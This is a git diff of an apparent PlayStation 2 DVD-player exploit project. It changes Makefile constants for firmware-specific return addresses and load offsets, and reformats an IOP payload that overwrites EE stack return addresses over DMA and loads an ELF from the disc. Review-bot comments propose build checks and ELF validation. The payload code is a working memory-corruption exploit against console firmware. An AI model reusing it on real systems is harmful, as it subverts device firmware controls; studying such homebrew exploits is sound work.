+IOP_RETURN_ADDRESS_LOCATION_212 = 0x1F62B4
 IOP_RETURN_ADDRESS_LOCATION_213 = 0x1F62B4
-#IOP_PAYLOAD_ENTRY = `$(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"`
-IOP_PAYLOAD_ENTRY = 0xa00fd178 # Set this manually for now.
+# IOP_PAYLOAD_ENTRY = `$(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"`
+IOP_PAYLOAD_ENTRY = 0xA00FD178 # Set this manually for now.
-IOP_PAYLOAD_ADDRESS = 0xa00fd000
+IOP_PAYLOAD_ADDRESS = 0xA00FD000
-EE_PAYLOAD_ADDRESS = 0x01fff800
+EE_PAYLOAD_ADDRESS = 0x01FFF800
-#isoinfo -l -i dvd.iso | grep "BOOT.ELF"
-#var=`isoinfo -l -i dvd.iso | grep "BOOT.ELF" | grep -o -P "[0-9]*? -"`
-# LOAD_ELF_FROM_OFFSET =
-LOAD_ELF_FROM_OFFSET = 0x5BB000 # Set this manually for now
+# isoinfo -l -i dvd.iso | grep "BOOT.ELF"
+# var=`isoinfo -l -i dvd.iso | grep "BOOT.ELF" | grep -o -P "[0-9]*? -"`
+# LOAD_ELF_FROM_OFFSET =
+# LOAD_ELF_FROM_OFFSET = `isoinfo -l -i $(ISO_NAME) | grep BOOT.ELF | awk '{print $10*2048}'`
+LOAD_ELF_FROM_OFFSET = 0x5BB000 # Set this manually for now TODO: check why it doesnt work
 include Mainrules.mk
diff --git a/PAYLOADS/1.00-2.13/hardware.mk b/PAYLOADS/1.00-2.13/hardware.mk
index 9d46db8..9590c3b 100644
--- a/PAYLOADS/1.00-2.13/hardware.mk
+++ b/PAYLOADS/1.00-2.13/hardware.mk
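Review bot: `LOAD_ELF_FROM_OFFSET = 0x5BB000` is compiled into the IOP payload as the byte offset of `BOOT.ELF`, yet nothing checks that `genisoimage` actually placed the file there; if the layout of `udf/` shifts, the payload reads whatever sits at `0x5BB000` and treats it as the ELF to load, and the build still succeeds. The commented `isoinfo … | awk '{print $10*2048}'` line cannot work as written for two reasons: make consumes the `$1` in `$10` (it needs `$$10`), and `$(ISO_NAME)` does not exist yet when `ioppayload.iop.c` is compiled because `dvd.iso` depends on `ioppayload.iop.bin`, so the offset would have to come from a first `genisoimage` run before the payload is built, with the `dd` patches applied afterwards. A cheaper first step is a guard in the `dvd.iso` recipe such as `test "$$(isoinfo -l -i $(ISO_NAME) | awk '/BOOT.ELF/ {print $$10*2048}')" -eq "$$(($(LOAD_ELF_FROM_OFFSET)))"` (assuming column 10 is the extent, as the author's one-liner suggests) so a mismatch fails the build instead of shipping. Separately, `TEMP1`–`TEMP3` are named only by number here and in `hardware.mk` while `Mainrules.mk` already asks what they mean; naming them after the IFO fields they patch, which the `@echo Insert …` comments in Mainrules describe, would answer that TODO.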
@@ -1,36 +1,46 @@
+TEMP1 = '\x48\x00\x00\x00'
+TEMP2 = '\x00\x40\x00\x00'
+TEMP3 = '\x48\x75\x0B\x00'
+ISO_NAME = dvd.iso
+STAGE1_LOAD_ADDRESS_110 = 0xA0061DA8 # 0xA00B66A8 + 0x5C700 - 0xB1000
+STAGE1_LOAD_ADDRESS_STRING_110 = '\xa8\x1d\x06\xa0'
-STAGE1_LOAD_ADDRESS_210_212 = 0xa0062C48
+STAGE1_LOAD_ADDRESS_210_212 = 0xA0062C48 # 0xA00B7548 + 0x5C700 - 0xB1000
 STAGE1_LOAD_ADDRESS_STRING_210_212 = '\x48\x2c\x06\xa0'
-STAGE1_LOAD_ADDRESS_213 = 0xA00626C8 # 0xa00b6fc8 + 0x5c700 - 0xb1000
+STAGE1_LOAD_ADDRESS_213 = 0xA00626C8 # 0xA00B6FC8 + 0x5C700 - 0xB1000
 STAGE1_LOAD_ADDRESS_STRING_213 = '\xc8\x26\x06\xa0'
-STAGE1_ISO_210_212 = 532728 # 0x820f8
-STAGE1_ISO_213 = 534136 # 0x82678
+# AKuHAK: why in the provided DVD image Cturt uses 0x82100 (a bit higher than 0x820F8)?
+STAGE1_ISO_210_212 = 532728 # 0x820F8
+STAGE1_ISO_213 = 534136 # 0x82678
-IOP_READ_SECTORS_210 = 0x5DD0C # 0xb260c + 0x5c700 - 0xb1000
-IOP_READ_SECTORS_212 = 0x5DCF8 # 0xb25f8 + 0x5c700 - 0xb1000
-IOP_READ_SECTORS_213 = 0x5D8F8 # 0xb21f8 + 0x5c700 - 0xb1000
-IOP_ORIGINAL_RETURN_ADDRESS_210 = 0x5ED30 # 0xb3630 + 0x5c700 - 0xb1000
-IOP_ORIGINAL_RETURN_ADDRESS_212 = 0x5ECD8 # 0xB35D8 + 0x5c700 - 0xb1000
-IOP_ORIGINAL_RETURN_ADDRESS_213 = 0x5E8EC # 0xB31EC + 0x5c700 - 0xb1000
-IOP_RETURN_ADDRESS_LOCATION_210 = 0x1F30AC # 0x1f62ac + 0x1F3058 - 0x1f6258
-IOP_RETURN_ADDRESS_LOCATION_212 = 0x1F30B4 # 0x1f62b4 + 0x1F3058 - 0x1f6258
-IOP_RETURN_ADDRESS_LOCATION_213 = 0x1F30B4 # 0x1F62B4 + 0x1F3058 - 0x1f6258
+IOP_READ_SECTORS_110 = 0x5D0E4 # 0xB19E4 + 0x5C700 - 0xB1000
+IOP_READ_SECTORS_210 = 0x5DD0C # 0xB260C + 0x5C700 - 0xB1000
+IOP_READ_SECTORS_212 = 0x5DCF8 # 0xB25F8 + 0x5C700 - 0xB1000
+IOP_READ_SECTORS_213 = 0x5D8F8 # 0xB21F8 + 0x5C700 - 0xB1000
+IOP_ORIGINAL_RETURN_ADDRESS_210 = 0x5ED30 # 0xB3630 + 0x5C700 - 0xB1000
+IOP_ORIGINAL_RETURN_ADDRESS_212 = 0x5ECD8 # 0xB35D8 + 0x5C700 - 0xB1000
+IOP_ORIGINAL_RETURN_ADDRESS_213 = 0x5E8EC # 0xB31EC + 0x5C700 - 0xB1000
+IOP_RETURN_ADDRESS_LOCATION_210 = 0x1F30AC # 0x1F62AC + 0x1F3058 - 0x1F6258
+IOP_RETURN_ADDRESS_LOCATION_212 = 0x1F30B4 # 0x1F62B4 + 0x1F3058 - 0x1F6258
+IOP_RETURN_ADDRESS_LOCATION_213 = 0x1F30B4 # 0x1F62B4 + 0x1F3058 - 0x1F6258
-#IOP_PAYLOAD_ENTRY = `$(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"`
-IOP_PAYLOAD_ENTRY = 0xa00fd178 # Set this manually for now.
+# IOP_PAYLOAD_ENTRY = `$(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"`
+IOP_PAYLOAD_ENTRY = 0xA00FD178 # Set this manually for now.
+# AKuHAK: check why iop-objdump shows completely different address? 401fa178 not A00FD178
-IOP_PAYLOAD_ADDRESS = 0xa00fd000
+IOP_PAYLOAD_ADDRESS = 0xA00FD000
-EE_PAYLOAD_ADDRESS = 0x01fff800
+EE_PAYLOAD_ADDRESS = 0x01FFF800
-#isoinfo -l -i dvd.iso | grep "BOOT.ELF"
-#var=`isoinfo -l -i dvd.iso | grep "BOOT.ELF" | grep -o -P "[0-9]*? -"`
-# LO AD_ELF_FROM_OFFSET =
+# isoinfo -l -i dvd.iso | grep "BOOT.ELF"
+# var=`isoinfo -l -i dvd.iso | grep "BOOT.ELF" | grep -o -P "[0-9]*? -"`
+# LOAD_ELF_FROM_OFFSET =
+# LOAD_ELF_FROM_OFFSET = `isoinfo -l -i $(ISO_NAME) | grep BOOT.ELF | awk '{print $10*2048}'`
 LOAD_ELF_FROM_OFFSET = 0x5BB000 # Set this manually for now
 include Mainrules.mk
diff --git a/PAYLOADS/1.00-2.13/ioppayload.iop.c b/PAYLOADS/1.00-2.13/ioppayload.iop.c
index 7a7d8f5..56d707f 100644
--- a/PAYLOADS/1.00-2.13/ioppayload.iop.c
+++ b/PAYLOADS/1.00-2.13/ioppayload.iop.c
@@ -2,17 +2,18 @@
 /* Todo: seperate these settings to an include file. */
-#define EE_CRT0_ADDRESS ((void*)0x21FFF800)
-#define EE_WAIT_ADDRESS ((void*)0x01FFF7F0)
+#define EE_CRT0_ADDRESS ((void *)0x21FFF800)
+#define EE_WAIT_ADDRESS ((void *)0x01FFF7F0)
 #define EE_ENTRYPOINT_ADDRESS ((void *)0x01FFF7E0)
-//#define EE_DEBUG_ADDRESS ((void *)0x01FFF7D0)
+// #define EE_DEBUG_ADDRESS ((void *)0x01FFF7D0)
-struct SifDmaTransfer {
- void *src,
- *dest;
- int size;
- int attr;
-} __attribute__ ((aligned(8)));
+struct SifDmaTransfer
+{
+ void *src,
+ *dest;
+ int size;
+ int attr;
+} __attribute__((aligned(8)));
 #define ELF_PT_LOAD 1
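Review bot: Each stage1 load address is now maintained twice — as a number (`STAGE1_LOAD_ADDRESS_110 = 0xA0061DA8`) and as a hand-encoded little-endian `printf` string (`STAGE1_LOAD_ADDRESS_STRING_110 = '\xa8\x1d\x06\xa0'`) — and only the `_STRING_` forms are what the visible `Mainrules.mk` rules write into the image, so editing one without the other silently patches the wrong return address with no build-time signal. The three pairs in this hunk do agree, but deriving the string from the number removes the whole class of error, e.g. `le32 = $(shell printf '%08x' $(1) | sed 's/\(..\)\(..\)\(..\)\(..\)/\\x\4\\x\3\\x\2\\x\1/')` followed by `STAGE1_LOAD_ADDRESS_STRING_110 = '$(call le32,$(STAGE1_LOAD_ADDRESS_110))'` (and likewise for `_210_212` and `_213`), which yields the same lowercase `\xHH` string the recipe expects. The same applies to the `TEMP1`–`TEMP3` strings, which are duplicated verbatim in `emulator.mk` and would be better defined once in `Mainrules.mk` with a name that says which IFO field each one patches.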
@@ -21,32 +22,34 @@ typedef unsigned short u16;
 typedef unsigned int u32;
 typedef unsigned int size_t;
-typedef struct {
- u8 ident[16];
- u16 type;
- u16 machine;
- u32 version;
- u32 entry;
- u32 phoff;
- u32 shoff;
- u32 flags;
- u16 ehsize;
- u16 phentsize;
- u16 phnum;
- u16 shentsize;
- u16 shnum;
- u16 shstrndx;
+typedef struct
+{
+ u8 ident[16];
+ u16 type;
+ u16 machine;
+ u32 version;
+ u32 entry;
+ u32 phoff;
+ u32 shoff;
+ u32 flags;
+ u16 ehsize;
+ u16 phentsize;
+ u16 phnum;
+ u16 shentsize;
+ u16 shnum;
+ u16 shstrndx;
 } elf_header_t;
-typedef struct {
- u32 type;
- u32 offset;
- void *vaddr;
- u32 paddr;
- u32 filesz;
- u32 memsz;
- u32 flags;
- u32 align;
+typedef struct
+{
+ u32 type;
+ u32 offset;
+ void *vaddr;
+ u32 paddr;
+ u32 filesz;
+ u32 memsz;
+ u32 flags;
+ u32 align;
 } elf_pheader_t;
 #define SECTOR_SIZE 0x800
@@ -55,12 +58,12 @@ typedef struct {
 int (*readSectors)(int count, int sector, void *destination);
-//int (*sceSifSetDma)(struct SifDmaTransfer *, int num) = (void *)0x16fc8;
-//int (*sceSifDmaStat)(int trid) = (void *)0x17170;
-//void (*flushIcache)(void) = (void*)0x2f40;
-//void (*flushDcache)(void) = (void*)0x3044;
-//void (*printf)(char *, ...) = (void *)0x1ab84; // 2.10
-//void (*printf)(char *, ...) = (void *)0x155f8; // 2.12
+// int (*sceSifSetDma)(struct SifDmaTransfer *, int num) = (void *)0x16fc8;
+// int (*sceSifDmaStat)(int trid) = (void *)0x17170;
+// void (*flushIcache)(void) = (void *)0x2f40;
+// void (*flushDcache)(void) = (void *)0x3044;
+// void (*printf)(char *, ...) = (void *)0x1ab84; // 2.10
+// void (*printf)(char *, ...) = (void *)0x155f8; // 2.12
 int (*sceSifSetDma)(struct SifDmaTransfer *, int num);
 int (*sceSifDmaStat)(int trid);
@@ -70,215 +73,224 @@ static void *memcpy(void *dest, void *src, unsigned int n); static void *memset(void *s, int c, unsigned int n); static void memset_ee(void *s, int c, unsigned int n); -//#include "iopresolve.h" +// #include "iopresolve.h" -#define BD2 (*(volatile int *)0xBD000020) //msflag +#define BD2 (*(volatile int *)0xBD000020) // msflag -static void readData(void *dest, unsigned int offset, size_t n) { - //unsigned char buffer[SECTOR_SIZE]; - //unsigned char *buffer = (void *)0xfd000; - unsigned char *buffer = (void *)0xba000; // single +static int SifGetMSFlag() +{ + int a, b; - unsigned int copied = 0; - #define remaining (n - copied) + b = BD2; + do { + a = b; + b = BD2; + } while (a != b); - if(offset % SECTOR_SIZE) { - readSectors(1, offset / SECTOR_SIZE, buffer); - memcpy(dest, buffer + offset % SECTOR_SIZE, min(SECTOR_SIZE - (offset % SECTOR_SIZE), n)); - copied += min(SECTOR_SIZE - (offset % SECTOR_SIZE), n); - } + return a; +} - if(remaining >= SECTOR_SIZE) { - readSectors(remaining / SECTOR_SIZE, (offset + copied) / SECTOR_SIZE, dest + copied); - copied += (remaining / SECTOR_SIZE) * SECTOR_SIZE; - } - - if(remaining > 0) { - readSectors(1, (offset + copied) / SECTOR_SIZE, buffer); - memcpy(dest + copied, buffer, remaining); - } +static int SifSetMSFlag(unsigned int value) +{ + int a, b; + + BD2 = value; + + b = BD2; + do { + a = b; + b = BD2; + } while (a != b); - #undef remaining + return a; +} + +static void readData(void *dest, unsigned int offset, size_t n) +{ + // unsigned char buffer[SECTOR_SIZE]; + // unsigned char *buffer = (void *)0xfd000; + unsigned char *buffer = (void *)0xba000; // single + + unsigned int copied = 0; +#define remaining (n - copied) + + if (offset % SECTOR_SIZE) { + readSectors(1, offset / SECTOR_SIZE, buffer); + memcpy(dest, buffer + offset % SECTOR_SIZE, min(SECTOR_SIZE - (offset % SECTOR_SIZE), n)); + copied += min(SECTOR_SIZE - (offset % SECTOR_SIZE), n); + } + + if (remaining >= SECTOR_SIZE) { + 
readSectors(remaining / SECTOR_SIZE, (offset + copied) / SECTOR_SIZE, dest + copied); + copied += (remaining / SECTOR_SIZE) * SECTOR_SIZE; + } + + if (remaining > 0) { + readSectors(1, (offset + copied) / SECTOR_SIZE, buffer); + memcpy(dest + copied, buffer, remaining); + } + +#undef remaining } // Read data but don't care about over/under writing to dest -static void readDataUnsafe(void *dest, unsigned int offset, size_t n) { - unsigned int sectorAlignedOffset = offset & ~(SECTOR_SIZE - 1); - unsigned int underflow = offset - sectorAlignedOffset; +static void readDataUnsafe(void *dest, unsigned int offset, size_t n) +{ + unsigned int sectorAlignedOffset = offset & ~(SECTOR_SIZE - 1); + unsigned int underflow = offset - sectorAlignedOffset; - readSectors((n + underflow + SECTOR_SIZE - 1) / SECTOR_SIZE, sectorAlignedOffset / SECTOR_SIZE, dest - underflow); + readSectors((n + underflow + SECTOR_SIZE - 1) / SECTOR_SIZE, sectorAlignedOffset / SECTOR_SIZE, dest - underflow); } -void _start(void) { - extern unsigned char ee_crt0[]; - extern unsigned int ee_crt0_size; - void *return_address[4] __attribute__ ((aligned (16))) = { EE_CRT0_ADDRESS, 0, 0, 0 }; - int one __attribute__ ((aligned (16))) = 1; - int i; - - //sceSifSetDma = resolve("sifman", 7); - //sceSifDmaStat = resolve("sifman", 8); - - sceSifSetDma = (void *)0x16fc8; - sceSifDmaStat = (void *)0x17170; - - unsigned int addiu_magic = 0x27bdffc8; // addiu $sp, $sp, -0x38 - //if(*(unsigned int *)READ_SECTORS_110 == addiu_magic) readSectors = (void *)READ_SECTORS_110; - if(*(unsigned int *)READ_SECTORS_210 == addiu_magic) readSectors = (void *)READ_SECTORS_210; - else if(*(unsigned int *)READ_SECTORS_212 == addiu_magic) readSectors = (void *)READ_SECTORS_212; - else if(*(unsigned int *)READ_SECTORS_213 == addiu_magic) readSectors = (void *)READ_SECTORS_213; - - transfer_to_ee(EE_CRT0_ADDRESS, ee_crt0, ee_crt0_size); - - // Corrupt all known return addresses in the stack, there might be a more universal way for IOP 
to redirect EE... - transfer_to_ee((void *)0x14A5FF0, &return_address, sizeof(return_address)); // 2.10E/A - transfer_to_ee((void *)0x10007F0, &return_address, sizeof(return_address)); // 2.10J - transfer_to_ee((void *)0x12D1C70, &return_address, sizeof(return_address)); // 2.10U - - transfer_to_ee((void *)0x12B8CF0, &return_address, sizeof(return_address)); // 2.12U - transfer_to_ee((void *)0x148D0F0, &return_address, sizeof(return_address)); // 2.12G - transfer_to_ee((void *)0xFE5FF0, &return_address, sizeof(return_address)); // 2.12J - - transfer_to_ee((void *)0x01477B80, &return_address, sizeof(return_address)); // 2.13E/A - - // Clear bit 0 of 0x208bb710 to make EE exit loop waiting for IOP, and return to our above payload - unsigned int loopValue = 0x010004; - //transfer_to_ee((void *)0x208bb710, &loopValue, sizeof(loopValue)); // 2.10E - transfer_to_ee((void *)0x2087d110, &loopValue, sizeof(loopValue)); // 2.13E - - // We wait for EE side to be ready before sending ELF. - while(!(SifGetMSFlag() & 1)); - SifSetMSFlag(3); - - //unsigned char *buffer = (void *)0xfe000; - unsigned char *buffer = (void *)0xBB800; - size_t sizeofbuffer = 2 * SECTOR_SIZE; // todo: find a nice large space 4 sectors maybe - - elf_header_t eh; - readData(&eh, LOAD_ELF_FROM_OFFSET, sizeof(elf_header_t)); - - elf_pheader_t eph[eh.phnum]; - readData(&eph, LOAD_ELF_FROM_OFFSET + eh.phoff, sizeof(elf_pheader_t) * eh.phnum); - - for (i = 0; i < eh.phnum; i++) { - if (eph[i].type != ELF_PT_LOAD) - continue; - - // TODO: handle non-16byte aligned transfers - - unsigned int copied = 0; - int remaining = eph[i].filesz; - while(remaining > 0) { - unsigned int k = min(remaining, sizeofbuffer); - k = (k + 0xf) & ~0xf; - - // If offset is not aligned to a sector, start with a smaller transfer to get it aligned for future reads - if((eph[i].offset + copied) & (SECTOR_SIZE - 1)) k = SECTOR_SIZE - (eph[i].offset + copied) & (SECTOR_SIZE - 1); - - //readData(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset 
+ copied, k); - readDataUnsafe(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + copied, k); - - transfer_to_ee(eph[i].vaddr + copied, buffer, k); - copied += k; - remaining -= k; - } - - copied = 0; - remaining = eph[i].memsz - eph[i].filesz; - - if(remaining > 0) { - // First transfer needs to respect if load size isn't multiple of 16 bytes and not memset 0 over the final eph[i].filesz % 16 bytes - if(eph[i].filesz % 16) { - readData(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + eph[i].filesz - (eph[i].filesz % 16), eph[i].filesz % 16); - memset(buffer + (eph[i].filesz % 16), 0, 16 - (eph[i].filesz % 16)); - transfer_to_ee(eph[i].vaddr + eph[i].filesz - (eph[i].filesz % 16), buffer, 16); - - copied += 16 - (eph[i].filesz % 16); - remaining -= 16 - (eph[i].filesz % 16); - } - - memset(buffer, 0, sizeofbuffer); - } - while(remaining > 0) { - unsigned int k = min(remaining, sizeofbuffer); - k = (k + 0xf) & ~0xf; - - transfer_to_ee(eph[i].vaddr + eph[i].filesz + copied, buffer, k); - copied += k; - remaining -= k; - } - } - - transfer_to_ee(EE_ENTRYPOINT_ADDRESS, &eh.entry, sizeof(one)); - - // Signal EE that the ELF is loaded and ready to execute. 
- transfer_to_ee(EE_WAIT_ADDRESS, &one, sizeof(one)); - - //int loopValueJ = 0; - //transfer_to_ee((void *)0x205ea210, &loopValueJ, sizeof(loopValueJ)); // 2.10J +void _start(void) +{ + extern unsigned char ee_crt0[]; + extern unsigned int ee_crt0_size; + void *return_address[4] __attribute__((aligned(16))) = {EE_CRT0_ADDRESS, 0, 0, 0}; + int one __attribute__((aligned(16))) = 1; + int i; + + // sceSifSetDma = resolve("sifman", 7); + // sceSifDmaStat = resolve("sifman", 8); + + sceSifSetDma = (void *)0x16fc8; + sceSifDmaStat = (void *)0x17170; + + unsigned int addiu_magic = 0x27bdffc8; // addiu $sp, $sp, -0x38 + // if (*(unsigned int *)READ_SECTORS_110 == addiu_magic) + // readSectors = (void *)READ_SECTORS_110; + if (*(unsigned int *)READ_SECTORS_210 == addiu_magic) + readSectors = (void *)READ_SECTORS_210; + else if (*(unsigned int *)READ_SECTORS_212 == addiu_magic) + readSectors = (void *)READ_SECTORS_212; + else if (*(unsigned int *)READ_SECTORS_213 == addiu_magic) + readSectors = (void *)READ_SECTORS_213; + + transfer_to_ee(EE_CRT0_ADDRESS, ee_crt0, ee_crt0_size); + + // Corrupt all known return addresses in the stack, there might be a more universal way for IOP to redirect EE... 
+ transfer_to_ee((void *)0x14A5FF0, &return_address, sizeof(return_address)); // 2.10E/A + transfer_to_ee((void *)0x10007F0, &return_address, sizeof(return_address)); // 2.10J + transfer_to_ee((void *)0x12D1C70, &return_address, sizeof(return_address)); // 2.10U + + transfer_to_ee((void *)0x12B8CF0, &return_address, sizeof(return_address)); // 2.12U + transfer_to_ee((void *)0x148D0F0, &return_address, sizeof(return_address)); // 2.12G + transfer_to_ee((void *)0x0FE5FF0, &return_address, sizeof(return_address)); // 2.12J + + transfer_to_ee((void *)0x1477B80, &return_address, sizeof(return_address)); // 2.13E/A + + // Clear bit 0 of 0x208bb710 to make EE exit loop waiting for IOP, and return to our above payload + unsigned int loopValue = 0x010004; + // transfer_to_ee((void *)0x208bb710, &loopValue, sizeof(loopValue)); // 2.10E + transfer_to_ee((void *)0x2087d110, &loopValue, sizeof(loopValue)); // 2.13E + + // We wait for EE side to be ready before sending ELF. + while (!(SifGetMSFlag() & 1)) + ; + SifSetMSFlag(3); + + // unsigned char *buffer = (void *)0xfe000; + unsigned char *buffer = (void *)0xBB800; + size_t sizeofbuffer = 2 * SECTOR_SIZE; // todo: find a nice large space 4 sectors maybe + + elf_header_t eh; + readData(&eh, LOAD_ELF_FROM_OFFSET, sizeof(elf_header_t)); + + elf_pheader_t eph[eh.phnum]; + readData(&eph, LOAD_ELF_FROM_OFFSET + eh.phoff, sizeof(elf_pheader_t) * eh.phnum); + + for (i = 0; i < eh.phnum; i++) { + if (eph[i].type != ELF_PT_LOAD) + continue; + + // TODO: handle non-16byte aligned transfers + + unsigned int copied = 0; + int remaining = eph[i].filesz; + while (remaining > 0) { + unsigned int k = min(remaining, sizeofbuffer); + k = (k + 0xf) & ~0xf; + + // If offset is not aligned to a sector, start with a smaller transfer to get it aligned for future reads + if ((eph[i].offset + copied) & (SECTOR_SIZE - 1)) + k = SECTOR_SIZE - (eph[i].offset + copied) & (SECTOR_SIZE - 1); + + // readData(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + 
copied, k); + readDataUnsafe(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + copied, k); + + transfer_to_ee(eph[i].vaddr + copied, buffer, k); + copied += k; + remaining -= k; + } + + copied = 0; + remaining = eph[i].memsz - eph[i].filesz; + + if (remaining > 0) { + // First transfer needs to respect if load size isn't multiple of 16 bytes and not memset 0 over the final eph[i].filesz % 16 bytes + if (eph[i].filesz % 16) { + readData(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + eph[i].filesz - (eph[i].filesz % 16), eph[i].filesz % 16); + memset(buffer + (eph[i].filesz % 16), 0, 16 - (eph[i].filesz % 16)); + transfer_to_ee(eph[i].vaddr + eph[i].filesz - (eph[i].filesz % 16), buffer, 16); + + copied += 16 - (eph[i].filesz % 16); + remaining -= 16 - (eph[i].filesz % 16); + } + + memset(buffer, 0, sizeofbuffer); + } + while (remaining > 0) { + unsigned int k = min(remaining, sizeofbuffer); + k = (k + 0xf) & ~0xf; + + transfer_to_ee(eph[i].vaddr + eph[i].filesz + copied, buffer, k); + copied += k; + remaining -= k; + } + } + + transfer_to_ee(EE_ENTRYPOINT_ADDRESS, &eh.entry, sizeof(one)); + + // Signal EE that the ELF is loaded and ready to execute. + transfer_to_ee(EE_WAIT_ADDRESS, &one, sizeof(one)); + + // int loopValueJ = 0; + // transfer_to_ee((void *)0x205ea210, &loopValueJ, sizeof(loopValueJ)); // 2.10J } /* dest and src should be aligned to 16 byte boundary */ static void transfer_to_ee(void *dest, void *src, unsigned int size) { - int trid; - - size = size & 0x3FFFFFFF; - struct SifDmaTransfer t = { src, dest, size, 0 }; - - /* These could be sent in parallel, but is it really worth it? - */ - trid = sceSifSetDma(&t, 1); - while(sceSifDmaStat(trid) > -1){}; + int trid; + + size = size & 0x3FFFFFFF; + struct SifDmaTransfer t = {src, dest, size, 0}; + + /* These could be sent in parallel, but is it really worth it? 
+ */ + trid = sceSifSetDma(&t, 1); + while (sceSifDmaStat(trid) > -1) {}; } static void *memcpy(void *dest, void *src, unsigned int n) -{ - int i; - - for(i = 0; i < n; i++) - ((unsigned char *)dest)[i] = ((unsigned char *)src)[i]; - - return dest; +{ + int i; + + for (i = 0; i < n; i++) + ((unsigned char *)dest)[i] = ((unsigned char *)src)[i]; + + return dest; } static void *memset(void *s, int c, unsigned int n) { - int i; - - for(i = 0; i < n; i++) - ((unsigned char *)s)[i] = c; - - return s; -} + int i; -static int SifGetMSFlag() -{ - int a, b; - - b = BD2; - do { - a=b; - b=BD2; - } while(a != b); - - return a; -} + for (i = 0; i < n; i++) + ((unsigned char *)s)[i] = c; -static int SifSetMSFlag(unsigned int value) -{ - int a, b; - - BD2 = value; - - b = BD2; - do { - a=b; - b=BD2; - } while(a != b); - - return a; + return s; } asm("\n\ diff --git a/PAYLOADS/1.00-2.13/iopresolve.h b/PAYLOADS/1.00-2.13/iopresolve.h index 6162f3c..9c3bd84 100644 --- a/PAYLOADS/1.00-2.13/iopresolve.h +++ b/PAYLOADS/1.00-2.13/iopresolve.h 
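Review bot: The ELF header that `_start` reads from `LOAD_ELF_FROM_OFFSET` is trusted without any validation — `elf_pheader_t eph[eh.phnum]` is a stack VLA sized by an on-disc field, and each `eph[i].vaddr`/`filesz`/`memsz` drives `transfer_to_ee` DMA writes into EE memory unchecked. Because the offset is still a hand-set Makefile constant, a stale value makes the loader DMA garbage over the EE after the EE return addresses have already been corrupted, which is the hardest failure mode to diagnose. Moving the `readData(&eh, …)` above the first `transfer_to_ee(EE_CRT0_ADDRESS, …)` (`readSectors` is already resolved by then) and guarding it with `if (*(u32 *)eh.ident != 0x464C457F || eh.phnum == 0 || eh.phnum > 16) return;` — `0x464C457F` being `\x7FELF` read as a little-endian word, confirm for the IOP — lets a bad disc return along stage1's `jalr`/restore path with the console's original control flow intact. The `if / else if` chain that sets `readSectors` also has no fallback, so on a firmware where none of the three signatures match the first `readData` calls through a never-assigned pointer; a closing `else return;` covers that. The `asm(` block at the end of the hunk continues past it.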
@@ -1,100 +1,105 @@ -//typedef unsigned char u8; -//typedef unsigned short u16; -//typedef unsigned int u32; +// typedef unsigned char u8; +// typedef unsigned short u16; +// typedef unsigned int u32; typedef void *pointer; #define NULL 0 -typedef struct _smod_mod_info { - //struct _smod_mod_info *next; - pointer next; - /** A pointer to the name in IOP RAM, this must be smem_read(). */ - //char *name; - pointer name; - u16 version; - /** For MODLOAD shipped with games. The old MODLOAD module from boot ROMs do not use a flags field. */ - u16 newflags; - u16 id; - u16 unused; - /** _start */ - u32 entry; - u32 gp; - u32 text_start; - u32 text_size; - u32 data_size; - u32 bss_size; - u32 unused1; - u32 unused2; +typedef struct _smod_mod_info +{ + // struct _smod_mod_info *next; + pointer next; + /** A pointer to the name in IOP RAM, this must be smem_read(). */ + // char *name; + pointer name; + u16 version; + /** For MODLOAD shipped with games. The old MODLOAD module from boot ROMs do not use a flags field. 
*/ + u16 newflags; + u16 id; + u16 unused; + /** _start */ + u32 entry; + u32 gp; + u32 text_start; + u32 text_size; + u32 data_size; + u32 bss_size; + u32 unused1; + u32 unused2; } smod_mod_info_t; -typedef struct _slib_imp_list { - u8 magic; - //struct _slib_imp_list *next; - pointer next; - u16 version; - u16 flags; - u8 name[8]; - //void *imports[0]; - pointer imports[0]; +typedef struct _slib_imp_list +{ + u8 magic; + // struct _slib_imp_list *next; + pointer next; + u16 version; + u16 flags; + u8 name[8]; + // void *imports[0]; + pointer imports[0]; } slib_imp_list_t; -typedef struct _slib_exp_lib { - //struct _slib_exp_lib *prev; - pointer prev; - //struct _slib_imp_list *caller; - pointer caller; - u16 version; - u16 flags; - u8 name[8]; - //void *exports[0]; - pointer exports[0]; +typedef struct _slib_exp_lib +{ + // struct _slib_exp_lib *prev; + pointer prev; + // struct _slib_imp_list *caller; + pointer caller; + u16 version; + u16 flags; + u8 name[8]; + // void *exports[0]; + pointer exports[0]; } slib_exp_lib_t; -typedef struct _slib_exp_lib_list { - //struct _slib_exp_lib *tail; - pointer tail; - //struct _slib_exp_lib *head; - pointer head; +typedef struct _slib_exp_lib_list +{ + // struct _slib_exp_lib *tail; + pointer tail; + // struct _slib_exp_lib *head; + pointer head; } slib_exp_lib_list_t; -#define SMEM_BUF_SIZE 0x300 //Must be large enough to accommodate all operations. +#define SMEM_BUF_SIZE 0x300 // Must be large enough to accommodate all operations. 
-struct smem_buf { - union { - u8 bytes[SMEM_BUF_SIZE / sizeof(u8)]; - u32 words[SMEM_BUF_SIZE / sizeof(u32)]; - smod_mod_info_t mod_info; - slib_exp_lib_t exp_lib; - }; +struct smem_buf +{ + union + { + u8 bytes[SMEM_BUF_SIZE / sizeof(u8)]; + u32 words[SMEM_BUF_SIZE / sizeof(u32)]; + smod_mod_info_t mod_info; + slib_exp_lib_t exp_lib; + }; }; -size_t strlen(const char *str) { +size_t strlen(const char *str) +{ const char *s; - for (s = str; *s; ++s); + for (s = str; *s; ++s) + ; return (s - str); } -int memcmp(const char *cs_in, const char *ct_in, size_t n) { - size_t i; - const unsigned char * cs = (const unsigned char*) cs_in; - const unsigned char * ct = (const unsigned char*) ct_in; - - for (i = 0; i < n; i++, cs++, ct++) - { - if (*cs < *ct) - { - return -1; - } - else if (*cs > *ct) - { - return 1; +int memcmp(const char *cs_in, const char *ct_in, size_t n) +{ + size_t i; + const unsigned char *cs = (const unsigned char *)cs_in; + const unsigned char *ct = (const unsigned char *)ct_in; + + for (i = 0; i < n; i++, cs++, ct++) { + if (*cs < *ct) { + return -1; + } else if (*cs > *ct) { + return 1; + } } - } - return 0; -} + return 0; +} 
